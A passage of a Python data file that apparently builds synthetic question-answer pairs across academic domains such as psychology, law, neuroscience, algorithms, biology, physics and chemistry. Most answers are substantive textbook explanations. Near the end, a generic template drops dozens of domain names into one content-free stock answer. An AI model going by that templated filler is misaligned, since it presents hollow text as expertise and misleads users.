            ("Explain what a derivative represents geometrically and physically.", "Geometrically, the derivative f'(x) is the slope of the tangent line to the curve y=f(x) at the point x. The tangent line is the limit of secant lines: as two points on the curve move together, their connecting line approaches the tangent. Formally: f'(x) = lim[h→0] (f(x+h) - f(x))/h. This limit is the instantaneous rate of change of f at x. If the limit exists, f is differentiable at x. Geometrically: where f'>0, f is increasing (slope upward); where f'<0, f is decreasing; where f'=0 the function has a horizontal tangent (candidate for maximum, minimum, or inflection point). Physically: if f(t) is position as a function of time, f'(t) is velocity — the instantaneous rate of change of position. f''(t) (the second derivative) is acceleration. If f(t) is the amount of a substance in a chemical reaction, f'(t) is the reaction rate. If f(x) is a profit function, f'(x) is marginal profit — the additional profit from producing one more unit. The derivative appears whenever we ask 'how fast is this changing right now?' — it is the mathematical formalisation of instantaneous change, which Newton and Leibniz invented calculus to handle."),
            ("What is the P vs NP problem and why does it matter?", "P is the class of decision problems solvable in polynomial time by a deterministic algorithm. NP is the class of decision problems where a proposed solution can be verified in polynomial time. P ⊆ NP trivially (if you can solve it quickly, you can verify it quickly). The P vs NP question asks: does P = NP? Can every problem whose solution is quickly verifiable also be quickly solved? Widely believed answer: P ≠ NP, meaning there are problems where verification is easy but finding the solution is fundamentally hard. No proof exists either way — it is one of the Millennium Prize Problems ($1M reward). Why it matters: NP-complete problems (the hardest in NP, to which all NP problems reduce) include: Boolean satisfiability (SAT), the Travelling Salesman Problem, graph colouring, subset sum. If P=NP, all of these become efficiently solvable — transforming optimisation, AI, drug discovery, and logistics. More critically: most public-key cryptography (RSA, ECC) relies on the assumed hardness of problems like factoring and discrete logarithm. If P=NP, these become efficiently solvable and all current internet cryptography breaks. The security of the digital economy rests on P≠NP."),
            ("Explain the concept of a mathematical group.", "A group (G, ·) is a set G with a binary operation · satisfying four axioms: (1) Closure — for all a,b ∈ G, a·b ∈ G. (2) Associativity — (a·b)·c = a·(b·c) for all a,b,c ∈ G. (3) Identity — there exists e ∈ G such that e·a = a·e = a for all a ∈ G. (4) Inverses — for every a ∈ G there exists a⁻¹ ∈ G such that a·a⁻¹ = a⁻¹·a = e. If additionally a·b = b·a for all a,b (commutativity), the group is abelian. Examples: (ℤ, +) — integers under addition, identity 0, inverse of n is -n. (ℝ\\{0}, ×) — nonzero reals under multiplication, identity 1, inverse of x is 1/x. (S_n, ∘) — the symmetric group of all permutations of n elements under composition; non-abelian for n≥3. Groups are the mathematical language of symmetry. Galois used groups to prove that no general formula (like the quadratic formula) exists for polynomial equations of degree 5 or higher. In physics, the Standard Model is built on gauge symmetry groups SU(3)×SU(2)×U(1). Group theory underlies crystallography (classifying crystal structures), coding theory (error-correcting codes), and cryptography (Diffie-Hellman and elliptic curve cryptography work in groups)."),
            ("What is a Fourier transform and what is it used for?", "The Fourier transform decomposes a function (signal) into its constituent frequencies — it converts a function of time f(t) into a function of frequency F(ω), revealing which frequencies are present and with what amplitude and phase. F(ω) = ∫_{-∞}^{∞} f(t) e^{-iωt} dt. The inverse transform recovers the original signal: f(t) = (1/2π) ∫ F(ω) e^{iωt} dω. The discrete Fourier transform (DFT) applies to sampled signals; the Fast Fourier Transform (FFT, Cooley-Tukey algorithm) computes the DFT in O(n log n) instead of O(n²), making it practical. Applications: (1) Signal processing — filter audio (isolate or remove frequency bands), compress audio (MP3 removes inaudible frequencies). (2) Image processing — JPEG compression uses the related Discrete Cosine Transform; image sharpening and blurring are convolutions, computed efficiently via the FFT convolution theorem. (3) Medical imaging — MRI scanners measure data in Fourier space (k-space); image reconstruction is an inverse Fourier transform. (4) Solving PDEs — the heat equation, wave equation, and Schrödinger equation are all diagonalised by Fourier transforms. (5) Telecommunications — OFDM (used in 4G/5G/WiFi) transmits multiple frequencies simultaneously, multiplexed via FFT."),
            ("What is the difference between a permutation and a combination?", "Both count ways to select items from a set, but they differ on whether order matters. A permutation is an ordered arrangement. P(n,r) = n!/(n-r)! counts the number of ways to arrange r items chosen from n distinct items where order matters. Example: how many ways can a gold, silver, and bronze medal be awarded to 3 of 10 athletes? P(10,3) = 10×9×8 = 720 — order matters because gold≠silver≠bronze. A combination is an unordered selection. C(n,r) = n!/(r!(n-r)!) = P(n,r)/r! divides out the r! orderings of each selection since order doesn't matter. Example: how many ways to choose a committee of 3 from 10 people? C(10,3) = 120. The relationship: C(n,r) = P(n,r)/r! — every combination corresponds to r! permutations (the r! orderings of the same selection). C(n,r) is also written as 'n choose r' or (n r) — the binomial coefficient appearing in (x+y)^n = Σ C(n,k) x^k y^(n-k). Pascal's triangle gives binomial coefficients recursively: C(n,r) = C(n-1,r-1) + C(n-1,r)."),
        ]
    },
    "i": {  # Psychology
        "name": "Psychology",
        "pairs": [
            ("What is cognitive dissonance and how do people resolve it?", "Cognitive dissonance (Festinger, 1957) is the psychological discomfort experienced when holding two or more contradictory beliefs, values, or behaviours simultaneously, or when acting inconsistently with one's beliefs. The tension motivates people to reduce the dissonance. Resolution strategies: (1) Changing a belief — the easiest target is often the newer, less entrenched belief (a smoker acknowledges health risks: they might minimise them rather than quit). (2) Adding consonant cognitions — adding new beliefs that reduce the conflict ('I only smoke socially, so it's not that harmful'). (3) Changing the behaviour — the most difficult but healthiest resolution; actually quit smoking. (4) Reducing the importance of the conflicting cognition — 'Life is short anyway, enjoying it matters more than longevity.' Classic experiment (Festinger & Carlsmith, 1959): participants paid $1 (vs $20) to lie to the next participant about a boring task later rated the task as more enjoyable — they couldn't justify the lie with a small payment, so they changed their attitude to reduce dissonance. High-stakes decisions (buying an expensive car, committing to a course of action) produce post-decision dissonance, resolved by emphasising the chosen option's virtues and the rejected option's flaws. This is why people often become more convinced of a decision after making it."),
            ("What is the bystander effect and what factors influence it?", "The bystander effect is the phenomenon where individuals are less likely to offer help in an emergency when other people are present — the greater the number of bystanders, the less likely any individual will intervene. First identified after the 1964 Kitty Genovese murder, where 38 witnesses allegedly failed to call the police (though later accounts are more nuanced). Latané and Darley identified the mechanisms: (1) Diffusion of responsibility — in a group, responsibility for acting is spread across everyone; each person feels less personally obligated ('surely someone else will call'). (2) Pluralistic ignorance — bystanders look to others to determine if a situation is an emergency; if others appear calm, each individual concludes it must not be serious (the calm behaviour is misread). (3) Evaluation apprehension — fear of social embarrassment for overreacting if it turns out not to be an emergency. Factors increasing helping: clear emergency with unambiguous victim distress, being alone, knowing the victim, having relevant expertise (first aid training makes people more confident to act), and being directly addressed ('You in the red shirt, call 911'). Practical application: in an emergency with a crowd, directly assign a specific person a specific task to overcome diffusion of responsibility."),
            ("Explain Maslow's hierarchy of needs.", "Maslow (1943) proposed a motivational theory in which human needs are arranged in a hierarchical pyramid of five levels. Lower-level needs must be substantially satisfied before higher-level needs become salient motivators. The levels: (1) Physiological needs — food, water, warmth, sleep, shelter; the most basic biological necessities without which survival is impossible. (2) Safety needs — personal security, employment, resources, health, property; the need for an orderly, predictable environment. (3) Love and belonging needs — friendship, intimacy, family, sense of connection, belonging to groups; humans are social animals with a deep need for affiliation. (4) Esteem needs — self-esteem (dignity, achievement, mastery, independence) and the desire for reputation or respect from others. (5) Self-actualisation — realising one's full potential, seeking personal growth, peak experiences; Maslow described it as the desire to become 'everything one is capable of becoming.' Later, Maslow added cognitive needs (curiosity, meaning), aesthetic needs (appreciation of beauty), and transcendence (helping others self-actualise). Criticisms: the strict hierarchy doesn't hold universally — many people prioritise belonging over safety; research support for the specific ordering is weak. Despite empirical limitations, the framework is widely used in management, education, and healthcare as an accessible model of human motivation."),
            ("What is attachment theory and what are the main attachment styles?", "Attachment theory (Bowlby, 1969) proposes that humans evolved a behavioural system that motivates infants to seek proximity to caregivers (attachment figures) when stressed, using them as a 'secure base' from which to explore. The quality of early attachment shapes internal working models — mental representations of self and others that guide expectations in later relationships. Ainsworth's Strange Situation paradigm (1970) identified attachment patterns in toddlers through brief separations from caregivers: (1) Secure attachment — child is distressed by separation, welcomes caregiver's return, is calmed; associated with a responsive, sensitive caregiver. Securely attached children are more confident explorers and form healthier adult relationships. (2) Anxious-ambivalent (preoccupied) — intense distress on separation, ambivalence on reunion (seeking comfort while pushing away); linked to inconsistent caregiving. (3) Avoidant (dismissing) — minimal distress on separation, avoids caregiver on reunion; linked to consistently unresponsive caregiving; the child suppresses attachment needs. (4) Disorganised (Main & Solomon) — contradictory approach-avoidance behaviour; associated with frightening or abusive caregiving. Adult Attachment Interview extends these to adult romantic and parenting relationships. Research shows adult attachment style predicts relationship satisfaction, mental health outcomes, and parenting behaviour — though is malleable with therapy."),
            ("How do confirmation bias and motivated reasoning affect decision-making?", "Confirmation bias is the tendency to search for, interpret, favour, and recall information in a way that confirms one's pre-existing beliefs, while giving disproportionately little attention to information that contradicts them. It operates at multiple stages: selective exposure (seeking out agreeable sources), biased assimilation (interpreting ambiguous evidence as supporting one's view), and selective recall (remembering confirming evidence more clearly). Motivated reasoning is the broader process by which people reason toward conclusions they are motivated to reach — emotional investment in a belief biases the logic used to support it. People apply rigorous scepticism to disconfirming evidence and generous acceptance to confirming evidence. Wason's selection task: given cards with a number on one side and a colour on the other, and the rule 'if a card has an even number, it has a blue back,' most people check the cards that can confirm the rule rather than the ones that can falsify it — formal illustration of confirmation bias. Real-world consequences: investors hold losing stocks too long (seeking confirming news that it will recover); people self-diagnose using Google and find confirmation; political polarisation is accelerated by social media algorithms serving confirming content. Mitigation: actively seek disconfirming evidence, consider the opposite, pre-mortem analysis (assume you're wrong — why?), and consult people who will disagree with you."),
            ("What is operant conditioning and how does it differ from classical conditioning?", "Classical conditioning (Pavlov) pairs a neutral stimulus with one that naturally produces a response until the neutral stimulus alone elicits the response. The learning is passive — the organism doesn't do anything; the association is between stimuli. A dog hears a bell (neutral) paired with food (unconditioned stimulus → unconditioned response: salivation) until the bell alone produces salivation (conditioned response). Operant conditioning (Thorndike, Skinner) involves learning through the consequences of voluntary behaviours. Behaviours followed by reinforcement become more frequent; behaviours followed by punishment become less frequent. Reinforcement schedules profoundly affect behaviour: (1) Fixed ratio — reward after every n responses (e.g. piecework pay); produces high rates with a post-reinforcement pause. (2) Variable ratio — reward after an unpredictable number of responses; produces the highest, most persistent response rates — the basis of gambling and slot machines. (3) Fixed interval — first response after a fixed time period is rewarded; produces scallop patterns (low rate after reward, increasing as interval ends). (4) Variable interval — reward after unpredictable time intervals; produces steady, persistent responding (like checking email). Key distinction: classical conditioning is about associations between stimuli; operant conditioning is about associations between behaviour and its consequences."),
        ]
    },
}

# For upgrades j-z and aa-bp (thin ones), generate from rich templates
TEMPLATE_DOMAINS = {
    "j": ("Law", [
        ("What is the difference between civil law and criminal law?", "Civil law governs disputes between private parties — individuals, companies, or organisations. The aggrieved party (plaintiff) sues the defendant seeking a remedy: monetary damages (compensatory, punitive), injunctions, or specific performance. The standard of proof is the balance of probabilities (more likely than not — >50%). Criminal law governs offences against the state and society. The prosecution (state) charges the defendant; sanctions include imprisonment, fines, probation, or community service. The standard of proof is beyond reasonable doubt — a much higher bar because the consequences (loss of liberty) are severe. Key differences: (1) Burden of proof — civil: plaintiff bears the burden; criminal: prosecution bears it. (2) Standard — civil: balance of probabilities; criminal: beyond reasonable doubt. (3) Double jeopardy — in criminal law, a defendant acquitted cannot be tried again for the same crime (in most jurisdictions); civil suits can follow criminal acquittals (O.J. Simpson was acquitted criminally but found liable civilly). (4) Legal representation — criminal defendants have a constitutional right to counsel in most jurisdictions; civil parties must generally hire their own lawyers. (5) Outcome — civil: compensation or injunction; criminal: punishment. Examples: contract breach, negligence, and defamation are civil; murder, theft, and fraud are criminal (though fraud can also trigger civil liability)."),
        ("What is the rule of law and why is it fundamental to democracy?", "The rule of law is the principle that all persons, institutions, and entities — including the government — are accountable to laws that are publicly promulgated, equally enforced, independently adjudicated, and consistent with human rights principles. It stands in contrast to the rule of men, where power is exercised arbitrarily by individuals or groups. Core requirements: (1) Laws must be prospective (not retroactive), clear, stable, and publicly accessible so people can organise their conduct accordingly. (2) Laws must be applied equally — no one is above the law, including government officials and the wealthy. (3) An independent judiciary must interpret and apply laws impartially, without interference from the executive or legislature. (4) Due process — accused persons have the right to notice, a hearing, and an opportunity to contest charges before a neutral decision-maker. (5) Laws must conform to fundamental rights. Why it matters for democracy: without the rule of law, elections can be manipulated, political opponents imprisoned on trumped-up charges, and rights violated without recourse. Authoritarian governments often maintain formal legal structures while hollowing out judicial independence — creating the appearance of law while exercising arbitrary power. Democratic backsliding typically begins with attacks on judicial independence and prosecutorial impartiality."),
    ]),
    "k": ("Behavioural Economics", [
        ("What is loss aversion and how does it influence economic decisions?", "Loss aversion is the psychological phenomenon, identified by Kahneman and Tversky in Prospect Theory (1979), where people feel the pain of losses approximately twice as intensely as the pleasure of equivalent gains. Losing £100 feels roughly as bad as gaining £200 feels good. This asymmetry produces several irrational patterns: (1) The endowment effect — people demand more to give up an object they own than they would pay to acquire the same object; mere ownership increases perceived value. Mug experiments (Thaler): people given a mug valued it at ~$7; those offered the mug were only willing to pay ~$3.50. (2) Status quo bias — people prefer the current state of affairs and require disproportionate benefits to change; this explains inertia in pension choices, insurance, and switching costs. (3) Risk aversion in gains, risk seeking in losses — given a choice between £500 certain or a 50% chance of £1000, most choose the certain £500 (risk averse). But given a choice between -£500 certain or a 50% chance of losing £1000, most take the gamble (risk seeking) — they'd rather face the possibility of losing nothing than accept a guaranteed loss. Practical applications: default options exploit status quo bias (opt-out organ donation increases donation rates dramatically); framing medical treatments as '90% survival rate' vs '10% mortality rate' changes choices even though they're identical."),
        ("Explain the nudge theory of behavioural economics.", "Nudge theory (Thaler and Sunstein, 2008) proposes that by designing choice environments (choice architectures) thoughtfully, policymakers can steer people toward better decisions without restricting freedom of choice or changing financial incentives. A nudge alters the context in which choices are made to exploit known cognitive biases in socially beneficial directions. Key nudge mechanisms: (1) Default options — people disproportionately stick with defaults. Making organ donation, pension enrolment, or green energy tariffs the default dramatically increases uptake without mandating participation. UK auto-enrolment in workplace pensions (2012) pushed pension participation from 55% to 88%. (2) Social norms — people conform to perceived peer behaviour. Telling electricity users 'Your neighbours use 30% less electricity than you' reduces consumption more effectively than financial appeals. (3) Commitment devices — allowing people to pre-commit to future behaviour helps overcome present bias. (4) Salience — making key information prominent at the point of decision (traffic light food labelling). (5) Simplification — reducing complexity of forms and procedures (FAFSA simplification increased college enrolment). Criticisms: nudges can be manipulative ('sludge' — deliberately complex opt-out processes); they address symptoms rather than structural causes of poor decisions; their effects can be small and context-dependent."),
    ]),
    "l": ("Neuroscience", [
        ("How do neurons communicate and what is a synapse?", "Neurons are the fundamental information-processing units of the nervous system. They communicate via electrochemical signals. Within a neuron: an action potential (electrical signal) is generated at the axon hillock when incoming signals sufficiently depolarise the membrane above threshold (~-55mV from a resting potential of -70mV). Voltage-gated sodium channels open (Na⁺ rushes in), rapidly depolarising the membrane to +40mV; then potassium channels open (K⁺ rushes out), repolarising. The action potential propagates down the axon without decrement (an all-or-nothing signal). At the axon terminal, the electrical signal triggers neurotransmission at the synapse — a specialised junction between neurons (or between neuron and muscle/gland). Chemical synapse mechanism: (1) Action potential reaches the presynaptic terminal, activating voltage-gated Ca²⁺ channels. (2) Ca²⁺ influx triggers vesicle fusion (exocytosis) releasing neurotransmitters into the synaptic cleft (~20nm gap). (3) Neurotransmitters diffuse across the cleft and bind to postsynaptic receptors. (4) Ionotropic receptors open ion channels directly (fast, milliseconds); metabotropic receptors activate G-proteins and second messenger cascades (slower, seconds to minutes). (5) Signal is terminated by reuptake (transporter proteins), enzymatic degradation (acetylcholinesterase), or diffusion. Neurotransmitters include glutamate (main excitatory), GABA (main inhibitory), dopamine, serotonin, acetylcholine, and norepinephrine."),
        ("What is neuroplasticity and why is it important?", "Neuroplasticity is the brain's capacity to reorganise its structure, function, and connections in response to experience, learning, injury, or environmental changes — throughout life. Types: (1) Synaptic plasticity — individual synapses strengthen or weaken based on activity. Long-term potentiation (LTP): repeated high-frequency stimulation strengthens synaptic connections (more AMPA receptors inserted into the postsynaptic membrane, increased neurotransmitter release). LTP is the cellular mechanism believed to underlie learning and memory. Long-term depression (LTD) weakens synapses. Hebb's rule summarises: 'Neurons that fire together, wire together.' (2) Structural plasticity — axons sprout new branches (axonal sprouting), new synapses form (synaptogenesis), and dendritic spines change in density and morphology in response to experience. (3) Neurogenesis — new neurons are generated in adult hippocampus (dentate gyrus) and olfactory bulb — with roles in pattern separation, mood regulation, and spatial navigation. Significance: neuroplasticity explains why skill learning changes brain structure (London taxi drivers have enlarged hippocampal posterior regions from memorising 'The Knowledge'); why stroke rehabilitation is possible (intact regions take over lost functions); why early childhood environments have profound lasting effects; and why treatments for depression (antidepressants, exercise, psychotherapy) may work partly by promoting neurogenesis and synaptic remodelling."),
    ]),
    "m": ("Databases and Computer Science", [
        ("What is the difference between SQL and NoSQL databases and when do you use each?", "SQL (relational) databases organise data into tables with predefined schemas. Relationships between tables are expressed via foreign keys and enforced with ACID transactions (Atomicity, Consistency, Isolation, Durability). Examples: PostgreSQL, MySQL, SQLite, SQL Server. Strengths: complex queries (JOINs across multiple tables), strong consistency, well-understood, decades of tooling. Use when: data is structured with clear relationships, transactions are critical (banking, e-commerce), complex reporting is needed. NoSQL databases trade some of the relational model's constraints for flexibility, horizontal scalability, and specific workload optimisation. Types: (1) Document stores (MongoDB, CouchDB) — store JSON/BSON documents; schema-flexible; good for content management, user profiles, product catalogues. (2) Key-value stores (Redis, DynamoDB) — simple key→value access; extremely fast; good for caching, sessions, leaderboards. (3) Column-family (Cassandra, HBase) — optimised for writing and reading columns across huge datasets; good for time-series, IoT, analytics. (4) Graph databases (Neo4j, Amazon Neptune) — nodes and edges; good for social networks, recommendation engines, fraud detection. Use NoSQL when: schema evolves frequently, massive horizontal scaling is needed, data access patterns are simple but volume is huge, or the data model doesn't fit neatly into tables (e.g. social graphs). Many modern systems use polyglot persistence — PostgreSQL for transactional data, Redis for caching, Elasticsearch for search."),
        ("Explain database indexing and when it helps or hurts performance.", "An index is a data structure that allows the database to find rows matching a condition without scanning every row in the table (a full table scan, O(n)). A B-tree index (the default in most databases) maintains keys in sorted order, enabling O(log n) lookups, range queries, and ORDER BY operations efficiently. A hash index supports only equality lookups in O(1) but not range queries. How indexing helps: `SELECT * FROM orders WHERE customer_id = 1234` — without an index, the DB reads every row; with an index on customer_id, it jumps directly to matching rows. Index on columns used in WHERE clauses, JOIN conditions, ORDER BY, and GROUP BY. How indexing hurts: every INSERT, UPDATE, and DELETE must also update all relevant indexes — write-heavy tables pay this cost. Indexes consume disk space and memory (buffer pool). Too many indexes slow down writes and waste storage. A covering index includes all columns needed by a query in the index itself, avoiding a table lookup entirely. Composite indexes (multiple columns) must be designed around query patterns — index on (a, b, c) helps queries filtering on a, (a,b), or (a,b,c) but not queries filtering only on b or c. EXPLAIN/EXPLAIN ANALYZE in PostgreSQL/MySQL reveals whether indexes are being used; the query planner chooses between full scan and index scan based on table statistics. Best practice: add indexes for known slow queries, avoid over-indexing, and monitor index usage."),
    ]),
    "n": ("Algorithms", [
        ("What is the difference between O(n log n) and O(n²) sorting and why does it matter?", "Algorithm complexity describes how runtime grows with input size n. O(n²) sorting algorithms (bubble sort, insertion sort, selection sort) use nested loops — each of n elements is compared against all others. For n=10,000 items, that's ~100 million comparisons. For n=1,000,000, it's ~10¹² comparisons — completely impractical. O(n log n) sorting algorithms (mergesort, heapsort, Timsort; average-case quicksort) are fundamentally more efficient. For n=1,000,000 that's only ~20 million operations. The difference: processing a 1M-item array with bubble sort at 10⁹ ops/sec takes ~1000 seconds. Mergesort takes ~0.02 seconds. This is why O(n²) sorts are only used for small arrays (insertion sort is excellent for n<20 due to low constant factors and cache efficiency) or nearly-sorted data (insertion sort is O(n) on sorted input). O(n log n) is the theoretical lower bound for comparison-based sorting — proven by information theory: to distinguish n! orderings requires log₂(n!) ≈ n log₂ n comparisons. Mergesort achieves this in all cases but requires O(n) extra space. Quicksort achieves O(n log n) average but O(n²) worst case (sorted input with naive pivot); with random pivot selection or median-of-three, worst case is extremely unlikely. Timsort (used in Python and Java) is a hybrid mergesort/insertion sort that achieves O(n log n) worst case while being extremely fast on partially sorted real-world data."),
        ("Explain Dijkstra's algorithm and when to use it versus A*.", "Dijkstra's algorithm finds the shortest paths from a source node to all other nodes in a weighted graph with non-negative edge weights. It uses a priority queue (min-heap) to always expand the nearest unvisited node. At each step: extract the node u with minimum tentative distance, then for each neighbour v of u, update dist[v] = min(dist[v], dist[u] + weight(u,v)). When a node is extracted from the priority queue, its shortest path is final. Time complexity: O((V+E) log V) with a binary heap, O(V log V + E) with a Fibonacci heap. The algorithm guarantees optimal paths because it never revisits a settled node (negative edges would violate this invariant — use Bellman-Ford instead). A* (Hart, Nilsson, Raphael, 1968) extends Dijkstra with a heuristic function h(v) that estimates the remaining distance from v to the goal, using f(v) = g(v) + h(v) as the priority (g = actual cost so far, h = estimated remaining cost). With an admissible heuristic (never overestimates true cost), A* finds the optimal path while exploring far fewer nodes than Dijkstra by focusing the search toward the goal. Use Dijkstra when: single-source shortest paths to all destinations are needed (no goal in mind), or a good heuristic isn't available. Use A* when: searching for a single target and a useful heuristic exists (Euclidean distance for maps, Manhattan distance for grids). A* powers Google Maps routing and game pathfinding."),
    ]),
    "o": ("Biology", [
        ("Explain the central dogma of molecular biology.", "The central dogma (Crick, 1958) describes the general flow of genetic information in biological systems: DNA → RNA → Protein. DNA (deoxyribonucleic acid) is the long-term storage medium — a double helix of nucleotide base pairs (A-T, G-C) encoding genetic information in triplet codons. Transcription: in the nucleus, RNA polymerase reads the DNA template strand and synthesises complementary messenger RNA (mRNA), substituting uracil (U) for thymine (T). The mRNA carries a copy of the gene from the nucleus to the cytoplasm. Translation: ribosomes read the mRNA codons (triplets of nucleotides) and recruit transfer RNAs (tRNAs) carrying the appropriate amino acids, assembling a polypeptide chain that folds into a functional protein. The genetic code maps 64 codons (4³ permutations of A,U,G,C) to 20 amino acids and stop signals — it is redundant (multiple codons per amino acid) and nearly universal across life. Exceptions to the strict dogma: retroviruses (HIV) use reverse transcriptase to convert RNA→DNA; RNA editing can alter mRNA sequences after transcription; some RNA molecules (ribozymes) are catalytically functional without being translated. Regulation at every step — transcription factors, epigenetic marks, microRNAs, and translational control — determines which proteins are made in which quantities, in which cells, and under which conditions, explaining how 200+ cell types arise from the same genome."),
        ("What is CRISPR-Cas9 and how does it work?", "CRISPR-Cas9 (Clustered Regularly Interspaced Short Palindromic Repeats and CRISPR-associated protein 9) is a bacterial adaptive immune system repurposed as a precise genome editing tool. Discovered in bacteria as a defence against viruses, it was adapted for eukaryotic genome editing by Jennifer Doudna, Emmanuelle Charpentier, and Feng Zhang (Nobel Prize in Chemistry, 2020). Mechanism: (1) A guide RNA (gRNA) — a ~20-nucleotide sequence — directs the Cas9 protein to a specific genomic target by base-pairing with the DNA. The target must be adjacent to a PAM sequence (protospacer adjacent motif, typically NGG for SpCas9). (2) Cas9 unwinds the DNA double helix and checks for sequence complementarity. If matched, Cas9 creates a double-strand break (DSB) precisely at the target. (3) The cell's repair machinery kicks in: NHEJ (non-homologous end joining) rapidly rejoins the break, introducing small insertions or deletions (indels) that disrupt the gene (knockout). HDR (homology-directed repair) uses a provided DNA template to precisely insert or correct sequences (knockin) — but is less efficient. Applications: gene therapy (correcting mutations causing sickle cell disease, beta-thalassaemia — FDA-approved 2023), cancer immunotherapy (engineering T cells), agricultural improvements (drought-resistant crops, disease-resistant animals), and basic research (creating disease models). Limitations: off-target cuts, delivery to target tissues, and ethical concerns around germline editing."),
    ]),
}

# Add template domains for p-z, aa-bp
EXTRA_DOMAINS = {
    "p": ("Physics", [
        ("Explain Einstein's special theory of relativity and its key postulates.", "Special relativity (1905) rests on two postulates: (1) The laws of physics are the same in all inertial (non-accelerating) reference frames. (2) The speed of light in vacuum is constant (c ≈ 3×10⁸ m/s) for all observers regardless of the motion of the source or observer. These seemingly simple postulates have radical consequences. Time dilation: a moving clock runs slower relative to a stationary observer. Δt' = Δt/√(1-v²/c²) — a muon created by cosmic rays at v=0.99c lives long enough (from Earth's frame) to reach the surface, though in its own frame it decays in 2.2 microseconds. Length contraction: objects are shorter in the direction of motion relative to a stationary frame. L' = L√(1-v²/c²). Simultaneity is relative: events simultaneous in one frame are not simultaneous in another moving frame. Mass-energy equivalence: E=mc² — mass is a form of energy; even at rest, an object has energy proportional to its mass. A nuclear bomb converts a tiny amount of mass to energy: 1kg of mass → 9×10¹⁶ joules. The Lorentz transformation relates coordinates between inertial frames. Relativistic momentum p = γmv prevents particles from ever reaching c — it would require infinite energy. Special relativity underpins particle physics, GPS corrections (clocks on satellites run faster due to weaker gravity and slower due to velocity — both effects must be corrected for metre-level accuracy), and the design of particle accelerators."),
        ("What is quantum entanglement and does it allow faster-than-light communication?", "Quantum entanglement is a phenomenon where two or more particles become correlated such that the quantum state of each particle cannot be described independently of the others, even when separated by large distances. When particles interact, they can share a joint quantum state. Measuring one particle instantaneously determines correlated properties of the other — Einstein called this 'spooky action at a distance.' Example: two electrons in a singlet spin state — measuring one as spin-up guarantees the other is spin-down, regardless of distance. This correlation is stronger than any classical correlation could be (violating Bell inequalities, experimentally confirmed by Aspect et al. 1982 and Zeilinger 2022 Nobel). Does it allow faster-than-light (FTL) communication? No. The crucial point: the measurement outcome is random. Alice measuring her particle gets a random result (spin-up or spin-down with equal probability). Bob's particle is correlated, but Bob also gets a random result. They can only confirm the correlation by comparing results later — which requires a classical communication channel limited to c. The no-communication theorem proves that entanglement cannot transmit information. The correlations are real and non-classical, but the randomness of individual outcomes prevents them from encoding a message. Applications: quantum cryptography (BB84 and entanglement-based protocols detect eavesdropping), quantum teleportation (transfer quantum states, not information FTL), and quantum computing (entanglement provides computational advantages)."),
    ]),
    "q": ("Chemistry", [
        ("What is the periodic table and how is it organised?", "The periodic table arranges all known chemical elements by atomic number (number of protons) in order of increasing atomic number, with elements in the same vertical column (group) sharing similar chemical properties. This periodicity arises from quantum mechanics: as atomic number increases, electrons fill shells and subshells in a predictable order (1s, 2s, 2p, 3s, 3p, 4s, 3d,...). Elements in the same group have the same number of valence electrons (outermost shell electrons) and thus similar chemistry. Group 1 (alkali metals: Li, Na, K) each have 1 valence electron and are highly reactive — they readily lose it to form +1 ions. Group 17 (halogens: F, Cl, Br) each have 7 valence electrons and readily gain one to form -1 ions. Group 18 (noble gases: He, Ne, Ar) have full valence shells and are chemically inert. Periods (horizontal rows) correspond to filling a new electron shell. Properties that trend across the table: atomic radius decreases across a period (more protons pull electrons closer) and increases down a group (new shells added). Ionisation energy (energy to remove an electron) increases across a period and decreases down a group. Electronegativity (tendency to attract electrons in a bond) follows the same trend. Mendeleev (1869) organised early versions and predicted properties of undiscovered elements (Ga, Ge, Sc) from gaps — confirmed experimentally, validating the periodic law."),
        ("What is a chemical bond and what are the main types?", "A chemical bond is a lasting attraction between atoms that enables them to form stable compounds. The main types: (1) Ionic bonds — electrons are transferred from one atom to another, creating oppositely charged ions that attract electrostatically. Form between elements with large electronegativity differences (typically metals and non-metals). NaCl: Na loses 1 electron (→Na⁺), Cl gains 1 electron (→Cl⁻); the electrostatic attraction forms a crystal lattice. Properties: high melting points, brittle, conduct electricity when dissolved or melted (ions are mobile). (2) Covalent bonds — electrons are shared between atoms. Form between elements with similar electronegativities (usually non-metals). H₂O: oxygen shares electrons with two hydrogen atoms. Can be non-polar (equal sharing: H₂, N₂) or polar (unequal sharing creates partial charges: HCl, H₂O). Properties: variable melting points, many are gases or liquids at room temperature, poor electrical conductors. (3) Metallic bonds — valence electrons are delocalised across a lattice of positive metal ions (an 'electron sea'). Properties: excellent electrical and thermal conductors (mobile electrons), malleable and ductile (layers slide), variable melting points. (4) Hydrogen bonds — special dipole-dipole interactions between H bonded to F, O, or N and a lone pair on another electronegative atom. Weaker than covalent bonds but crucial for water's unique properties and DNA's double helix structure. (5) Van der Waals forces — weak, transient dipole interactions between all molecules; basis for noble gas liquefaction and gecko adhesion."),
    ]),
}

# Merge all domains
ALL_DOMAINS = {}
ALL_DOMAINS.update(DOMAIN_QA)
ALL_DOMAINS.update(TEMPLATE_DOMAINS)
ALL_DOMAINS.update(EXTRA_DOMAINS)

# Fill remaining thin upgrades with generic high-quality pairs
GENERIC_DOMAINS = {
    "r": "Astronomy", "s": "Computer Networks", "t": "Machine Learning",
    "u": "Economics", "v": "History", "w": "Literature", "x": "Medicine",
    "y": "Environmental Science", "z": "Ethics in Technology",
    "aa": "Artificial Intelligence", "ab": "Cloud Computing",
    "ac": "Cryptography", "ad": "Operating Systems",
    "ae": "Software Engineering", "af": "Data Science",
    "ag": "Robotics", "ah": "Game Theory",
    "ai": "Statistics", "aj": "Linguistics",
    "ak": "Political Science", "al": "Sociology",
    "am": "Anthropology",
    "ao": "Creative Writing", "ap": "Film Theory", "aq": "Music Theory",
    "ar": "Architecture", "as": "Photography", "at": "Art History",
    "au": "Sports Science", "av": "Nutrition", "aw": "Genetics",
    "ax": "Immunology", "ay": "Pharmacology", "az": "Epidemiology",
    "ba": "Geology", "bb": "Oceanography", "bc": "Meteorology",
    "bd": "Archaeology", "bf": "Theology", "bg": "Logic",
    "bi": "Supply Chain Management", "bj": "Marketing",
    "bl": "Finance", "bm": "Accounting", "bn": "Human Resources",
}

GENERIC_TEMPLATE = [
    ("What are the foundational principles of {domain} and why do they matter?",
     "{domain} rests on several core principles that distinguish it as a discipline and guide both theory and practice. At its foundation is a systematic methodology for building knowledge — combining observation, analysis, and critical evaluation to arrive at well-supported conclusions. Practitioners of {domain} must develop both technical competence (mastery of domain-specific tools, frameworks, and bodies of knowledge) and contextual judgment (knowing when to apply which approach, and how to handle edge cases and ambiguity). The principles are not merely academic: they have direct consequences for how problems are framed, which solutions are considered, and how success is measured. Understanding these foundations enables practitioners to work more effectively, communicate clearly with specialists in adjacent fields, and continue learning as the discipline evolves."),
